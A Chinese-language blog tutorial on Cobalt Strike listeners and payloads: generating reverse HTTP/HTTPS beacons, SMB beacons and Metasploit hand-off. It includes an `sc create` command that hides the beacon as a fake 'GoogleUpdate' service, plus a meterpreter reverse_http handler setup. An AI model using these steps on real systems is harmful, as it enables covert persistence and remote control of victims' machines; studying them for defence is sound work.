CobaltStrike专题 | CobaltStrike监听及Payload使用

  • A+
所属分类:安全文章
CobaltStrike专题 | CobaltStrike监听及Payload使用
CobaltStrike专题 | CobaltStrike监听及Payload使用




声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。





CobaltStrike专题 | CobaltStrike监听及Payload使用
CobaltStrike专题 | CobaltStrike监听及Payload使用


CobaltStrike是一款模仿高级威胁者攻击行为后渗透攻击框架。覆盖了APT攻击链中所需要的多个技术环节,是一款小巧、灵活而又功能强大的后渗透攻击工具。


官方网站:
https://www.cobaltstrike.com
https://www.cobaltstrike.com/support


01

CobaltStrike监听介绍



CobaltStrike监听器主要是指,在团队服务器上监听某个端口,然后等待负载[payload]回连到这个端口上,进行传输数据。注意:CobaltStrike默认只能生成Windows系统模式的Payload,操作过程具体如下:
CobaltStrike专题 | CobaltStrike监听及Payload使用

  • 点击菜单中的"Listeners"->"payload"下拉就能看到CobaltStrike所支持的所有payload了。
CobaltStrike专题 | CobaltStrike监听及Payload使用

02


基于http协议的反向连接


所谓基于http协议的反向连接,就是把木马回连的流量,按照http协议的数据格式进行封,该方式又叫模拟http协议进行传输,因为http协议对防火墙的穿透效果较好,所以大多数人喜欢使用基于http协议Payload

(1)设置监听主机的ip地址及端口号:
CobaltStrike专题 | CobaltStrike监听及Payload使用

(2)生成windows系统的可执行文件
CobaltStrike专题 | CobaltStrike监听及Payload使用

(3)选择http协议,可执行文件为64位:
CobaltStrike专题 | CobaltStrike监听及Payload使用

(4)再目标主机上双击可行性文件后,可看到能够成功反弹beacon shell
CobaltStrike专题 | CobaltStrike监听及Payload使用

03


基于https协议的反向连接



(1)首先创建一个beacon_https的监听器,设置监听的ip地址和端口号:
CobaltStrike专题 | CobaltStrike监听及Payload使用


(2)生成 https 协议的 beacon shell:

CobaltStrike专题 | CobaltStrike监听及Payload使用


(3)将生成的 beacon shell 放在目标主机的 C:WindowsHelpHelp 目录,执行指令:

#sc create GoogleUpdate binpath= "C:WindowsHelpHelpservrcs.exe" start= auto displayname= "Plugins Transfer Service"创建系统服务#sc start GoogleUpdate启动该服务#sc stop GoogleUpdate停止该服务#sc delete GoogleUpdate删除指定服务,一定要先停止再删除
CobaltStrike专题 | CobaltStrike监听及Payload使用
CobaltStrike专题 | CobaltStrike监听及Payload使用



04


SMB 监听器


SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽。

CobaltStrike专题 | CobaltStrike监听及Payload使用

(1)派生一个SMB Beacon 在 Listeners 生成 SMB Beacon >目标主机>右键>spawn>选中Listeners >choose
CobaltStrike专题 | CobaltStrike监听及Payload使用
CobaltStrike专题 | CobaltStrike监听及Payload使用

(2)可以主Beacon上 用link host链接它或者unlink host断开它 。
CobaltStrike专题 | CobaltStrike监听及Payload使用

(3)后面4个圈的主机,就代表派生出来的shell.
CobaltStrike专题 | CobaltStrike监听及Payload使用



05


反向http协议外部监听器


外部监听器就是为了更方便的去配合其它的一些渗透工具如:Metasploit/empire 等,进行协同渗透而设计的。比如,现在通过其它方式已经拿到了目标内网一台机器的 beaconshell,但由于 CobaltStrike 自身内置的相关内网渗透功能太少, 想用 msf 或者 empire 继续去渗透目标内网,这时候我们就可以使用 CobaltStrike 的外部监听器了。


(1先启动msf监听器:
>>> use exploit/multi/handler>>> set payload windows/meterpreter/reverse_http>>> set lhost 192.168.80.129>>> set lport 1111>>> exploit -j
CobaltStrike专题 | CobaltStrike监听及Payload使用


(2)设置外部监听的ip地址和端口号
CobaltStrike专题 | CobaltStrike监听及Payload使用


(3)右键点击已有的beacon shell,选择Spawn 

CobaltStrike专题 | CobaltStrike监听及Payload使用


(4)选择foreign_http 外部监听

CobaltStrike专题 | CobaltStrike监听及Payload使用


(5)然后就可以在msf上成功看到反弹到的meterpreter了

CobaltStrike专题 | CobaltStrike监听及Payload使用

CobaltStrike专题 | CobaltStrike监听及Payload使用




关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!


推 荐 阅 读




CobaltStrike专题 | CobaltStrike监听及Payload使用
CobaltStrike专题 | CobaltStrike监听及Payload使用
CobaltStrike专题 | CobaltStrike监听及Payload使用

本文始发于微信公众号(潇湘信安):CobaltStrike专题 | CobaltStrike监听及Payload使用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: